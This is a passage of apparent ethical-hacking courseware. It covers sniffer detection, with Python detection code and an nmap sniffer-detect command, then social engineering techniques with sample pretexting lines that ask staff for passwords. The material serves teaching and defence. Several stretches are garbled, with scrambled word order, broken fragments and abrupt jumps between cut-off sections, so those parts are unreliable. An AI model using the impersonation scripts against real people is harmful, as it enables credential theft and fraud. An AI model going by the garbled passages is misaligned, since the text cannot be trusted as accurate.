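    Returns an empty list on systems without sysfs (non-Linux)."""
    found = []
    if not os.path.isdir(root):
        return found
    for iface in sorted(os.listdir(root)):
        try:
            with open(os.path.join(root, iface, "flags")) as fh:
                if is_promiscuous(fh.read()):
                    found.append(iface)
        except OSError:           # interface went away or flags not readable
            continue
    return found


def classify(samples):
    """Apply the same decoder to a {iface: flags_text} mapping (used for the demo)."""
    return sorted(name for name, flags in samples.items() if is_promiscuous(flags))


# Constructed sample: eth0 is UP|BROADCAST|MULTICAST, eth1 the same plus PROMISC,
# lo is UP|LOOPBACK.  Values mirror the format sysfs uses, not a real host.
SAMPLE_FLAGS = {"eth0": "0x1003\n", "eth1": "0x1103\n", "lo": "0x9\n"}

if __name__ == "__main__":
    print("sample:", classify(SAMPLE_FLAGS))
    print("this host:", scan_sysfs())
```

Run it from a scheduled job or a configuration-management check and alert on any interface that is not expected to be in promiscuous mode (bridges, IDS sensors and some virtualization hosts legitimately set it). It only sees the host it runs on, which is why the ping, DNS and ARP methods in the next section exist for the rest of the segment.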
SnifferDetectionTechniques
Ping Method
To detect a sniffer on a network,identifythe systemon the network running i n
promiscuous mode.The ping methodis usefuli n detecting a systemthat runs i n
promiscuous mode, whichin turn helps
to detectsniffersinstalledon the network.
whereas the suspect
to
Justsenda pingrequestthe suspected
address.TheEthernetadapter
machine withits IPaddressandincorrect MAC
will rejectit becausethe MACaddressdoesnot match,
runningthe snifferresponds
machine to it, as it doesnot reject
packets
with a differentMACaddress. Thus, this responsewill identify the snifferi n the
network.
Figure 8.61: Detecting a machine in promiscuous mode using the ping method (examiner and suspect machine)
DNS Method
Many sniffers resolve the IP addresses they capture into host names, which means a reverse DNS lookup (a PTR query, the opposite of the normal name-to-address lookup) is issued for every new address seen. Sniffers that perform reverse DNS lookups therefore increase DNS traffic, and this increase can be an indication of the presence of a sniffer on a network whose computers are in promiscuous mode. The lookups can be observed remotely or locally.
Remotely, monitor the organization's DNS server to identify incoming reverse DNS lookups. To force the issue, send ICMP requests to a non-existent IP address on the local network. No legitimate host has any reason to resolve that address, so a machine that issues a reverse lookup for it must have captured the ping, and the source of that DNS query is the sniffing host.
Locally, configure the detector itself in promiscuous mode. Send an ICMP request to a non-existent IP address and watch the traffic: if a reverse DNS lookup for that address appears, the machine issuing it can be identified as performing reverse DNS lookups of captured traffic. A machine generating reverse DNS lookup traffic for addresses it never communicated with is most likely running a sniffer.
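The following is an added example (not code from the course) of the DNS method on the server side: parse a DNS query log and report which client issued reverse (PTR) lookups for decoy addresses that the examiner pinged. The log lines are constructed here in BIND-style query-log format, and the decoy addresses 192.168.0.250 and 192.168.0.251 are assumptions for the example.

```python
import ipaddress
import re

# One BIND-style query-log line per query, e.g.
#   client 192.168.0.3#51234: query: 250.0.168.192.in-addr.arpa IN PTR + (192.168.0.10)
# Newer BIND versions prefix the client with "@0x..." and repeat the name in
# parentheses after the port; the pattern tolerates both forms.
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<client>\d{1,3}(?:\.\d{1,3}){3})#\d+"
    r"(?: \([^)]*\))?: query: (?P<qname>\S+) IN (?P<qtype>[A-Z0-9]+)"
)

# Constructed sample log (not real data). The examiner pinged the decoys
# 192.168.0.250 and .251, which do not exist. Host .1 does ordinary forward
# lookups, host .2 resolves the gateway (legitimate), host .3 resolves the decoys.
SAMPLE_LOG = [
    "10-Mar-2020 09:12:01.101 client 192.168.0.1#40211: query: www.example.com IN A + (192.168.0.10)",
    "10-Mar-2020 09:12:01.233 client 192.168.0.2#40212: query: 1.0.168.192.in-addr.arpa IN PTR + (192.168.0.10)",
    "10-Mar-2020 09:12:02.418 client @0x7f3c2c0a1d40 192.168.0.3#51234 (250.0.168.192.in-addr.arpa): query: 250.0.168.192.in-addr.arpa IN PTR + (192.168.0.10)",
    "10-Mar-2020 09:12:02.420 client @0x7f3c2c0a1d40 192.168.0.3#51235 (251.0.168.192.in-addr.arpa): query: 251.0.168.192.in-addr.arpa IN PTR + (192.168.0.10)",
    "10-Mar-2020 09:12:03.007 client 192.168.0.1#40213: query: mail.example.com IN MX + (192.168.0.10)",
]
DECOYS = {ipaddress.IPv4Address("192.168.0.250"), ipaddress.IPv4Address("192.168.0.251")}


def ptr_name_to_ip(qname):
    """'250.0.168.192.in-addr.arpa' -> IPv4Address('192.168.0.250'); None if not an IPv4 PTR name."""
    name = qname.rstrip(".").lower()
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return ipaddress.IPv4Address(".".join(reversed(octets)))
    except ValueError:
        return None


def sniffer_suspects(log_lines, decoys):
    """Return {client_ip: [decoy addresses it reverse-resolved]} for every client
    that issued a PTR query for a decoy. A decoy is an address nobody
    communicates with, so the only way to learn it is to capture the examiner's
    ping on the wire; the client that then resolves it is the sniffing host."""
    hits = {}
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m or m.group("qtype") != "PTR":
            continue
        ip = ptr_name_to_ip(m.group("qname"))
        if ip is not None and ip in decoys:
            hits.setdefault(m.group("client"), []).append(str(ip))
    return hits


if __name__ == "__main__":
    for client, addrs in sniffer_suspects(SAMPLE_LOG, DECOYS).items():
        print(f"{client} reverse-resolved decoy addresses {addrs}: probable sniffer")
```

Only a sniffer that performs name resolution shows up this way; Wireshark, for instance, has network name resolution switched off by default, so an empty result is not evidence that the segment is clean, and the method is best combined with the ping and ARP tests.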
Figure 8.63: Sniffing detection using the DNS method (pings sent to 192.168.0.1, 192.168.0.2, and 192.168.0.3; the host that issues a DNS lookup for the pinged address is the sniffer)
ARP Method
This technique first sends a non-broadcast ARP request, that is, an ARP request whose Ethernet destination is not the broadcast address, so that only a NIC in promiscuous mode will receive it. The node running in promiscuous mode processes the request and caches the sender's IP-to-MAC mapping in its local ARP table; the other nodes never see it. Next, broadcast a ping on the network using the local IP address but a different (spoofed) source MAC address. Only the node that already holds the mapping cached earlier can answer this broadcast ping directly: a machine in promiscuous mode replies to the ping message because it already has the information about the host sending the ping in its cache, whereas the remaining machines must first send an ARP probe to identify the source of the ping request. The node that replies without probing is the one on which the sniffer is running.
Figure 8.64: Detecting sniffing via the ARP method
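The following is an added simulation (not code from the course or from Nmap) of why the ping and ARP methods above work and when the naive ping variant fails. It models each host as a NIC hardware filter plus a Linux-style kernel frame classifier; the host model, the probe destination addresses, and the sample LAN of three hosts are assumptions for the example, and nothing is sent on a real network.

```python
from dataclasses import dataclass, field

BROADCAST = "ff:ff:ff:ff:ff:ff"
ALL_HOSTS = "01:00:5e:00:00:01"  # Ethernet mapping of 224.0.0.1, subscribed by every IPv4 host


def is_group_address(mac):
    """True when the I/G bit (lowest bit of the first octet) is set, i.e. the
    destination looks like a multicast or broadcast address."""
    return bool(int(mac.split(":")[0], 16) & 1)


@dataclass
class Host:
    name: str
    ip: str
    mac: str
    promiscuous: bool = False  # a sniffer has put the NIC in promiscuous mode
    mcast_groups: set = field(default_factory=lambda: {ALL_HOSTS})

    def nic_passes(self, dst_mac):
        """Hardware filter (assumed model): a non-promiscuous NIC only passes its
        own unicast address, the broadcast address and subscribed multicast groups."""
        if self.promiscuous:
            return True
        return dst_mac == self.mac or dst_mac == BROADCAST or dst_mac in self.mcast_groups

    def kernel_passes(self, dst_mac):
        """Kernel classification modelled on Linux eth_type_trans(): a frame whose
        destination is neither our MAC, nor broadcast, nor a group address is
        tagged PACKET_OTHERHOST and dropped by ip_rcv()/arp_rcv() even in
        promiscuous mode. Group addresses pass without a subscription check."""
        return dst_mac == self.mac or dst_mac == BROADCAST or is_group_address(dst_mac)

    def answers(self, dst_mac, target_ip):
        """Would this host reply to an ARP request or ICMP echo for target_ip
        carried in an Ethernet frame addressed to dst_mac?"""
        return target_ip == self.ip and self.nic_passes(dst_mac) and self.kernel_passes(dst_mac)


def probe(hosts, dst_mac):
    """Send one probe per host (target IP = that host's IP) in a frame whose
    destination MAC is dst_mac; return the names of the hosts that reply."""
    return [h.name for h in hosts if h.answers(dst_mac, h.ip)]


# Probe destination MACs (assumed set). BROADCAST is the control: every live host
# answers. The fake-group addresses are accepted by a promiscuous NIC but rejected
# by a normal NIC's hardware filter, while still carrying the group bit so that
# the kernel processes them instead of discarding them as "other host".
FAKE_GROUP_PROBES = {
    "ff:ff:ff:ff:ff:fe": "fake broadcast, last bit cleared",
    "ff:ff:00:00:00:00": "fake broadcast, upper 16 bits only",
    "01:00:00:00:00:00": "fake multicast, group bit only",
    "01:00:5e:00:00:00": "unsubscribed IPv4 multicast mapping",
}
WRONG_UNICAST = "00:11:22:33:44:55"  # what the naive ping method uses


def detect_promiscuous(hosts):
    """Flag hosts that answer the control probe AND at least one fake-group probe."""
    alive = set(probe(hosts, BROADCAST))
    flagged = set()
    for dst_mac in FAKE_GROUP_PROBES:
        flagged |= set(probe(hosts, dst_mac)) & alive
    return sorted(flagged)


# Constructed sample segment: only host C runs a sniffer.
LAN = [
    Host("A", "192.168.0.1", "00:16:20:01:23:45"),
    Host("B", "192.168.0.2", "00:0c:29:aa:bb:cc"),
    Host("C", "192.168.0.3", "00:50:56:dd:ee:ff", promiscuous=True),
]

if __name__ == "__main__":
    print("control (broadcast):", probe(LAN, BROADCAST))      # all three hosts
    print("wrong unicast MAC:  ", probe(LAN, WRONG_UNICAST))  # nobody: naive ping misses C
    for mac, why in FAKE_GROUP_PROBES.items():
        print(f"{mac} ({why}):", probe(LAN, mac))             # only C
    print("promiscuous hosts:", detect_promiscuous(LAN))     # ['C']
```

The wrong-unicast probe is the textbook ping method, and in this model it produces no reply at all, because the promiscuous host's kernel discards the frame before ICMP ever sees it; the fake-group probes are what make the ping and ARP tests reliable against such a host. Real NICs and operating systems differ in how strictly they filter, which is why scanners send several variants and treat any positive as a finding rather than requiring all of them to succeed.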
Promiscuous Detection Tools
Nmap
Source: https://nmap.org
Nmap's sniffer-detect NSE script allows you to check whether a system on a local Ethernet has its network card in promiscuous mode. Because the script works by sending crafted ARP requests and watching which hosts answer, it must be run with raw-packet privileges (root or Administrator) from a machine on the same Ethernet segment as the targets; it cannot test hosts on the far side of a router.
Command to detect a NIC in promiscuous mode:
nmap --script=sniffer-detect [Target IP Address/Range of IP addresses]
Figure 8.65: Screenshot showing Nmap output
NetScanTools Pro
Source: https://www.netscantools.com
NetScanTools Pro includes the Promiscuous Mode Scanner tool to scan your subnet for network interfaces in promiscuous mode, that is, interfaces listening for all Ethernet packets. Security professionals use NetScanTools Pro to scan the subnet with modified ARP packets and identify the devices responding to each type of ARP packet.
Figure 8.66: Screenshot of NetScanTools Pro Promiscuous Mode Scanner
Module Summary
In this module, we have discussed sniffing concepts along with protocols vulnerable to sniffing and various hardware protocol analyzers. We have also discussed various sniffing techniques, such as MAC attacks, DHCP attacks, ARP poisoning, spoofing attacks, and DNS poisoning, along with their countermeasures. This module also illustrated various sniffing tools and the countermeasures to be employed to prevent sniffing attacks. The module ended with a detailed discussion of various sniffing detection techniques.
In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, perform social engineering to steal critical information related to the target organization.
CEH | Certified Ethical Hacker
Module 09: Social Engineering
Module Objectives
Slide: Understanding Social Engineering Concepts; Understanding Different Social Engineering Techniques; Understanding Insider Threats; Understanding Impersonation on Social Networking Sites; Understanding Identity Theft; Understanding Social Engineering Countermeasures; Understanding Different Insider Threats and Identity Theft Countermeasures.
Module Objectives
This module provides an overview of social engineering. Although it focuses on fallacies and advocates effective countermeasures, the possible methods of extracting information from another human being rely on attackers' ingenuity. The features of these techniques make them an art, but the psychological nature of some of these techniques makes them a science. The "bottom line" is that there is no ready defense against social engineering; only constant vigilance can circumvent some social engineering techniques used by attackers.
This module provides insight into human-based, computer-based, and mobile-based social engineering techniques. It also discusses various insider threats, impersonation on social networking sites, and identity theft, as well as possible countermeasures.
At the end of this module, you will be able to:
- Describe social engineering concepts
- Perform social engineering using various techniques
- Describe insider threats
- Perform impersonation on social networking sites
- Describe identity theft
- Apply social engineering countermeasures
- Apply knowledge of insider threats and identity theft countermeasures
Module Flow
Slide: Social Engineering Concepts; Social Engineering Techniques; Insider Threats; Impersonation on Social Networking Sites; Identity Theft; Countermeasures.
Social Engineering Concepts
There is no single security mechanism that can protect from the social engineering techniques used by attackers. Only educating employees on how to recognize and respond to social engineering attacks can minimize attackers' chances of success. Before going ahead with this module, it is first necessary to discuss various social engineering concepts.
What is Social Engineering?
Slide: Social engineering is the art of convincing people to reveal confidential information; it works because people are unaware of the valuable information to which they have access.
What is Social Engineering? (Cont'd)
Slide: Factors that make companies vulnerable to attacks: insufficient security training, unregulated access to information, several organizational units, lack of security policies. Why is social engineering effective: security policies are only as strong as their weakest link; it is difficult to detect social engineering attempts; there is no method that can be applied to ensure complete security from social engineering attacks; there is no specific hardware or software for defending against a social engineering attack.
What is Social Engineering?
Before performing a social engineering attack, the attacker gathers information about the target organization from various sources such as:
- The organization's official websites, where employees' IDs, names, and email addresses are shared
- Advertisements of the target organization cast through media, which reveal information such as products and offers
- Blogs, forums, and other online spaces where employees share basic personal and organizational information
After gathering information, an attacker executes social engineering attacks using various approaches such as impersonation, piggybacking, tailgating, reverse social engineering, and other methods.
Social engineering is the art of manipulating people into divulging sensitive information in order to use it to perform some malicious action. Despite security policies, attackers can compromise an organization's sensitive information by using social engineering, which targets the weakness of people. Most often, employees are not even aware of a security lapse on their part and inadvertently reveal the organization's critical information, for instance by unwittingly answering strangers' questions or replying to spam email.
To succeed, attackers take a special interest in developing social engineering skills and can be so proficient that the victims might not even notice the fraud. Attackers always look for new ways to access information. They also ensure that they know the organization's perimeter and the people on its perimeter, such as security guards, receptionists, and help-desk workers, to exploit human oversight. People have conditioned themselves to not be overly suspicious, and they associate specific behaviors and appearances with known entities. For instance, a man in a uniform carrying a pile of packages for delivery will be perceived as a delivery person. With the help of social engineering tricks, attackers succeed in obtaining confidential information, authorization, and access details from people by deceiving and manipulating human vulnerability.
Common Targets of Social Engineering
A social engineer uses the vulnerability of human nature as their most effective tool. Usually, people believe and trust others and derive fulfillment from helping the needy. Discussed below are the most common targets of social engineering in an organization:
- System Administrators: A system administrator in an organization is responsible for maintaining the systems. Thus, they may have critical information such as the type and version of OS and admin passwords, which could be helpful for an attacker in planning an attack.
- Users and Clients: Attackers could approach users and clients of the target organization, pretending to be a tech support person, to extract sensitive information.
- Vendors of the Target Organization: Attackers may also target the vendors of the organization to gain critical information that could help in executing attacks.
- Senior Executives: Attackers could also approach senior executives from various departments such as Finance and HR, and CxOs, to obtain critical information about the organization.
Impact of Social Engineering Attack on an Organization
Social engineering does not seem like a serious threat, but it can lead to substantial losses for organizations. The impacts of a social engineering attack on organizations include:
- Economic Losses: Competitors may use social engineering techniques to steal sensitive information such as the development plans and marketing strategies of the target company, which can result in an economic loss.
- Damage to Goodwill: For an organization, goodwill is important for attracting customers. Social engineering attacks may damage that goodwill by leaking sensitive organizational data.
- Loss of Privacy: Privacy is a major concern, especially for big organizations. If an organization is unable to maintain the privacy of its stakeholders or customers, then people can lose trust in the company and may discontinue their business association with the organization. Consequently, the organization could face losses.
- Dangers of Terrorism: Terrorism and anti-social elements pose a threat to an organization's assets, people, and property.
—
talk.―
Hetold m e to
that hecan start his
you andaskyou to sendthe
Consensus or Social Proof
Consensus or social proof refers to the fact that people are usually willing to like or do things that other people like or do. Attackers take advantage of this by doing things like creating fake websites and posting testimonials from users about the benefits of certain products such as anti-malware (rogueware). Therefore, if users search the Internet to download the rogueware, they encounter these websites and believe the forged testimonials. Further, if users download the malicious product, attackers may install a trojan along with it.
Scarcity
Scarcity implies the state of being scarce. In the context of social engineering, scarcity often implies creating a feeling of urgency in a decision-making process. Due to this urgency, attackers can control the information provided to victims and manipulate the decision-making process.
For example, when Apple releases a new iPhone product that sells out and goes out of stock, attackers can take advantage of this situation by sending a phishing email to the target users, encouraging them to click on a link provided in the email to buy the product. If the users click on this link, they get redirected to some malicious website controlled by the attacker. As a result, the user might end up revealing their account details or downloading some malicious programs such as trojans.
Urgency
Urgency implies encouraging people to take immediate action. Attackers can take advantage of this by tricking victims into performing unintended tasks.
For example, ransomware often uses the urgency principle, which makes the victim take urgent action under a time limit. The victims see the countdown timer running on their infected systems and know that failure to make the required decision within the given time can result in the loss of important data. Similarly, attackers can send phishing emails indicating that a certain product is available; the recipients are tricked, and they click on the link to take immediate action. As a result, they are redirected to a malicious website and end up revealing their account details or downloading a virus file.
Familiarity or Liking
Familiarity or liking implies that people are more likely to be persuaded to do something when they are asked by someone whom they like. This indicates that people are more likely to buy products if they are advertised by an admired celebrity.
Greed
Some people are possessive by nature and seek to acquire vast amounts of wealth through illegal activities. Social engineers lure their targets to divulge information by promising something for nothing (appealing to their greed). For example, an attacker may pretend to be a competitor and lure the employees of the target into revealing critical information by offering a considerable reward.
Factors that Make Companies Vulnerable to Attacks
Many factors make companies vulnerable to social engineering attacks; some of them are as follows:
Insufficient Security Training
Employees can be ignorant about the social engineering tricks used by attackers to lure them into divulging sensitive data about the organization. Therefore, the minimum responsibility of any organization is to educate their employees about social engineering techniques and the threats associated with them to prevent social engineering attacks.
Unregulated Access to Information
For any company, one of its main assets is its database. Providing unlimited access or allowing everyone access to such sensitive data might cause trouble. Therefore, companies must ensure proper training of key personnel and surveillance for accessing sensitive data.
Several Organizational Units
Some organizations have their units at different geographic locations, making it difficult to manage the system. Further, this sort of setup makes it easier for an attacker to access the organization's sensitive information.
Lack of Security Policies
Security policy is the foundation of security infrastructure. It is a high-level document describing the security controls implemented in a company. An organization should take extreme measures related to every possible security threat or vulnerability. Implementation of certain security measures such as a password change policy, information sharing policy, access privileges, unique user identification, and centralized security prove to be beneficial.
Why is Social Engineering Effective?
Unlike other attack techniques, social engineering does not deal with network security issues; instead, it deals with the psychological manipulation of a human being to extract desired information.
The following are reasons why social engineering continues to be effective:
- Despite various security policies, preventing social engineering is a challenge because human beings are most susceptible to variation.
- It is challenging to detect social engineering attempts. Social engineering is the art and science of manipulating people into divulging information.
- No method guarantees complete security from social engineering attacks.
- No specific hardware or software is available to safeguard against social engineering attacks.
- This approach is relatively cheap (or free) and easy to implement.
Phases of a Social Engineering Attack
Slide: 1. Research the Target Company (dumpster diving, websites, employees, tour of the company); 2. Select a Target (identify frustrated employees of the target company); 3. Develop a Relationship (develop a relationship with the selected employees); 4. Exploit the Relationship.
Phases of a Social Engineering Attack
Attackers take the following steps to execute a successful social engineering attack:
Research the Target Company
Before attacking the target organization's network, an attacker gathers enough information to infiltrate the system. Social engineering is one technique that helps in extracting information. Initially, the attacker researches basic information about the target organization, such as the nature of the business, its location, number of employees, and other facts. While researching, the attacker indulges in activities such as dumpster diving, browsing the company's website, and finding employee details.
Select a Target
After finishing their research, the attacker selects a target for extracting sensitive information about the organization. Usually, attackers try to reach out to disgruntled employees because they are easier to manipulate.
Develop a Relationship
The attacker develops a relationship with the selected employees in order to accomplish their task.
Exploit the Relationship
The attacker exploits the relationship and extracts sensitive information about the organization's accounts, finance information, technologies in use, and upcoming plans.
Module Flow
Slide: Social Engineering Techniques (the current section of the module flow; the flow also lists Insider Threats and Countermeasures).
Social Engineering Techniques
Attackers implement various social engineering techniques to gather sensitive information from people or organizations that might help them to commit fraud or participate in other criminal activities.
This section deals with various human-based, computer-based, and mobile-based social engineering techniques, along with examples for a better understanding.
Types of Social Engineering
Slide: Human-based: sensitive information gathered by human interaction; Computer-based: sensitive information gathered with the help of computers; Mobile-based: sensitive information gathered with the help of mobile apps.
Types of Social Engineering
In a social engineering attack, the attacker uses their social skills to trick the victim into disclosing personal information such as credit card numbers, bank account numbers, and phone numbers, or confidential information about their organization or computer system. Attackers use this data to either launch an attack or to commit fraud. Social engineering attacks are categorized into three categories: human-based, computer-based, and mobile-based.
Human-based Social Engineering
An attacker can perform human-based social engineering by using the following techniques:
- Impersonation
- Vishing
- Eavesdropping
- Shoulder Surfing
- Dumpster Diving
- Reverse Social Engineering
- Piggybacking
- Tailgating
- Diversion Theft
- Honey Trap
- Baiting
- Quid Pro Quo
- Elicitation
Computer-based Social Engineering
Computer-based social engineering relies on computers and Internet systems to carry out the targeted action. The following are some of its techniques:
- Phishing
- Spam mail
- Pop-up window attacks
- Scareware
- Instant chat messenger
Mobile-based Social Engineering
Attackers use mobile applications to carry out mobile-based social engineering. Attackers trick the users by imitating popular applications, creating malicious mobile applications with attractive features and submitting them to the major app stores with the same name. Users unknowingly download the malicious app, allowing the malware to infect their device.
Listed below are some techniques attackers use to perform mobile-based social engineering:
- Publishing malicious apps
- Repackaging legitimate apps
- Using fake security applications
- SMiShing (SMS Phishing)
Human-based Social Engineering
Impersonation
Slide: The attacker pretends to be someone legitimate or an authorized person. Attackers may impersonate a legitimate or authorized person either personally or using a communication medium such as phone or email; impersonation helps attackers trick a target into revealing sensitive information. Impersonation examples follow.
Human-based Social Engineering (Cont'd)
Impersonation (Vishing)
Slide: Vishing (voice or VoIP phishing) is an impersonation technique (electronic fraud) in which the attacker uses voice technology to trick individuals into revealing personal and financial information. Slide examples: third-party authorization, tech support.
Human-based Social Engineering (Cont'd)
Slide: Eavesdropping; Shoulder Surfing; Dumpster Diving.
Human-based Social Engineering (Cont'd)
Slide: Reverse Social Engineering; Piggybacking; Tailgating (the attacker, wearing a fake ID badge, enters a secured area by closely following an authorized person through a door).
Human-based Social Engineering (Cont'd)
Slide: Baiting (attackers leave a malicious physical device in a location where people can easily find it).
Impersonation examples: posing as a legitimate end user; posing as an important end user; posing as a technical support agent; posing as an internal employee, client, or vendor; posing as a repairman; abusing the over-helpfulness of the help desk; third-party authorization; posing as a tech support agent through vishing; posing as a trusted authority.
Some impersonation tricks that an attacker performs to gather sensitive information about the target organization exploit the human nature of trust, fear, and moral obligation.
Posing as a Legitimate End User
An attacker might impersonate an employee and then resort to deviant methods to gain access to privileged data. They may provide a false identity to obtain sensitive information.
Another example is when a "friend" of an employee asks them to retrieve information that a bedridden employee supposedly needs. There is a well-recognized rule in social interaction that a favor begets a favor, even if the original "favor" is offered without a request from the recipient. This is known as reciprocation. Corporate environments deal with reciprocation daily. Social engineers try to take advantage of this social trait via impersonation.
Example:
"Hi! This is John from the finance department. I have forgotten my password. Can I get it?"
Posing as an Important User
Another behavioral factor that aids a social engineer is people's habit of not questioning authority. People often go out of their way for those whom they perceive to have authority. An attacker posing as an important individual, such as a vice president or director, can often manipulate an unprepared employee. Attackers who take impersonation to a higher level by assuming the identity of an important employee add an element of intimidation. The reciprocation factor also plays a role in this scenario, where lower-level employees might go out of their way to help a higher authority. For example, it is less likely that a help-desk employee will turn down a request from a vice president who is hard-pressed for time and needs some vital information for a meeting. In case an employee refuses to divulge information, social engineers may use authority to intimidate employees and may even threaten to report the employee's misconduct to their supervisors. This technique assumes greater significance when the attacker considers it a challenge to get away with impersonating an authority figure.
Example:
"Hi! This is Kevin, the CFO's secretary. I'm working on an urgent project and forgot my system password. Can you help me out?"
Posing as a Technical Support Agent
Another technique involves an attacker masquerading as a technical support agent, particularly when the victim is not proficient in technical areas. The attacker may pretend to be a hardware vendor, a technician, or a computer supplier. One demonstration at a hacker meeting had the speaker calling Starbucks and asking its employees whether their broadband connection was properly working. The perplexed employee replied that it was the modem that was giving them trouble. The hacker, without giving any credentials, went on to make him read out the credit card number of the last transaction. In a corporate scenario, the attacker may ask employees to reveal their login information, including their password, to fix a nonexistent problem.
Example:
"Sir, this is Mathew, technical support at X Company. Last night we had a system crash here, and we are checking for lost data. Can you give me your ID and password?"
Posing as an Internal Employee, Client, or Vendor
The attacker usually dresses up in business clothes or another suitable uniform. They enter an organization's building while pretending to be a contractor, client, service personnel, or another authorized person. Then they roam around unnoticed and look for passwords stuck on terminals, extract critical data from wastepaper bins and papers lying on desks, and perform other information gathering. The attacker may also implement other social engineering techniques such as shoulder surfing (observing users typing login credentials or other sensitive information) and eavesdropping (purposely overhearing confidential conversations between employees) to gather sensitive information that might help launch an attack on the organization.
Posing as a Repairman
Computer technicians, electricians, and telephone repair persons are generally unsuspected people. Attackers might impersonate a technician or repair person and enter the organization. They perform normal activities associated with their assumed duty while looking for hidden passwords, critical information on desks, information in trash bins, and other useful information; they sometimes even plant snooping devices in hidden locations.
Impersonation (Vishing)
Vishing (voice or VoIP phishing) is an impersonation technique in which the attacker uses Voice over IP (VoIP) technology to trick individuals into revealing their critical financial and personal information and uses the information for financial gain. The attacker uses caller ID spoofing to forge identification resembling a legitimate financial institution. In many cases, vishing includes pre-recorded messages and instructions. Through vishing, the attacker tricks the victim into providing bank account or credit card details for identity verification over the phone.
The attacker may send a fake SMS or email message to the victim, asking the victim to call the financial institution for credit card or bank account verification. In some cases, the victim receives a voice call from the attacker. When the victim calls the number listed in the message or receives the attacker's call, they hear recorded instructions that insist they provide personal and financial information like name, date of birth, social security number, bank account numbers, credit card numbers, or credentials like usernames and passwords. Once the victim provides the information, the recorded message confirms verification of the victim's account.
Discussed below are some tricks attackers use when vishing to gather sensitive information:
Abusing the Over-Helpfulness of the Help Desk
Help desks are frequently targeted for social engineering attacks for a reason. The staff members are trained to be helpful, and they often give away sensitive information such as passwords and network information without verifying the authenticity of the caller. The attacker should know employees' names and have details about the person he is
detect the problem. Believing them to be a troubleshooter, the user would provide the required information.
Example:
Attacker: "Hi, this is Mike from tech support. Some folks in your office have reported a slowdown in logging. Is this true?"
Employee: "Yes, it has seemed slow lately."
Attacker: "Well, we have moved you to a new server, and your service should be much better now. If you want to give me your password, I can check your service. Things will be better from now on."
Trusted Authority Figure
The most effective method of social engineering is posing as a trusted authority figure. An attacker might pretend to be a fire marshal, superintendent, auditor, director, or other important figure over the phone or in person to obtain sensitive information from the target.
Examples:
1. "Hi, I am John Brown. I'm with the external auditor, Arthur Sanderson. We've been requested by the corporate to do a surprise inspection of your disaster recovery procedures. Your department has 10 minutes to show me how you would recover from a website crash."
2. "Hi, I'm Sharon, a sales rep out of the New York office. I know this is short notice, but I have a group of prospective clients out in the car that I've been trying to get to outsource their security training needs to us for months. They're located just a few miles away, and I think that if I can give them a quick tour of our facilities, it would be enough to push them over the edge and get them to sign up. Oh yeah, they are particularly interested in what security precautions we've adopted. It seems someone hacked into their website a while back, which is one of the reasons they're considering our company."
3. "Hi, I'm with Aircon Express Services. We received a call that the computer room is getting too warm, so I need to check your HVAC system." Using professional-sounding terms like HVAC (Heating, Ventilation, and Air Conditioning) may add just enough credibility to an intruder's masquerade to allow them to access the targeted secured resource.
Eavesdropping
Eavesdropping refers to an unauthorized person listening to a conversation or reading others' messages. It includes the interception of any form of communication, including audio, video, or written, using channels such as telephone lines, email, and instant messaging. An attacker can obtain sensitive information such as passwords, business plans, phone numbers, and addresses.
Shoulder Surfing
Shoulder surfing is the technique of looking over someone's shoulder as they key information into a device. Attackers use shoulder surfing to find out passwords, personal identification numbers, account numbers, and other information. They sometimes even use binoculars and other optical devices or install small cameras to record the actions performed on the victim's system to obtain login details and other sensitive information.
Dumpster Diving
Dumpster diving is the process of retrieving sensitive personal or organizational information by searching through trash bins. Attackers can extract confidential data such as user IDs, passwords, policy numbers, network diagrams, account numbers, bank statements, salary data, source code, sales forecasts, access codes, phone lists, credit card numbers, calendars, and organizational charts on paper or disk. Attackers can then use this information to perform various malicious activities. Sometimes attackers even use pretexts to support their dumpster diving initiatives, such as impersonating a cleaner, a repair person, technician, or other legitimate worker.
Information that attackers can obtain by searching through trash bins includes:
- Phone lists: Disclose employees' names and contact numbers.
- Organizational
Support: placing their contact number on the error message itself. Even if the attacker has already acquired the desired information, they may continue to assist the users so that they remain ignorant of the hacker's identity.
A good example of a reverse social engineering virus is the "MyParty" worm. This virus does not rely on sensational subject lines but rather makes use of inoffensive and realistic names for its attachments. By using realistic names, the attacker gains the user's trust, confirms the user's ignorance, and completes the task of information gathering.
Piggybacking
Piggybacking
usually
implies
entryinto a building
or securityarea with the consent of the
authorizedperson.Forexample,an attackermight requestan authorizedpersonto unlock
securitydoor,sayingthat theyhave forgotten their ID badge.
In the interest of common
theauthorizedpersonwill allowtheattackerto passthrough
courtesy, the door.
Tailgating
Tailgating implies accessing a building or secured area without the consent of the authorized person. It is the act of following an authorized person through a secure entrance, as a polite user would open and hold the door for those following them. An attacker, wearing a fake badge, might attempt to enter the secured area by closely following an authorized person through a door that requires key access. They then try to enter the restricted area while pretending to be an authorized person.
Diversion Theft
Diversion theft is a technique where attackers target delivery professionals or transport companies. This technique is also known as "Round the Corner Game" or "Corner Game." The main objective of this technique is to trick a person responsible for making a genuine delivery into delivering the consignment to the wrong location, thus interrupting the transaction. For example, if the victim is a van driver delivering a package, then that person would be persuaded to drive to a location other than the actual delivery location. Subjecting the van driver to a series of social engineering tricks thus allows the theft to be successful.
Ethical Hacking and Countermeasures Copyright © by EC-Council
Baiting
Baiting is a technique in which attackers offer end users something alluring in exchange for important information such as login details and other sensitive data. This technique relies on the curiosity and greed of the end-users. Attackers perform this technique by leaving a physical device such as a USB flash drive containing malicious files in locations where people can easily find them, such as parking lots, elevators, and bathrooms. This physical device is labeled with a legitimate company's logo, thereby tricking end-users into trusting it and opening it on their systems. Once the victim connects and opens the device, a malicious
who have access to sensitive information. In social engineering, the purpose of elicitation is to extract relevant information to gain access to the target assets.
Computer-based Social Engineering
Attackers perform computer-based social engineering using various malicious applications and software programs such as viruses, trojans, and spyware, and applications such as email and instant messaging. Discussed below are types of computer-based social engineering attacks:
Pop-Up Windows
Pop-ups trick or compel users into clicking a hyperlink that redirects them to fake web pages asking for personal information or downloading malicious programs such as keyloggers, trojans, or spyware.
Examples of pop-ups used for tricking users:
Figure 9.2: Screenshots showing sample Windows pop-ups
Hoax Letters
A hoax is a message warning its recipients of a non-existent computer virus threat. It relies on social engineering to spread its reach. Usually, hoaxes do not cause any physical damage or loss of information; but they cause a loss of productivity and use an organization's valuable network resources.
Chain Letters
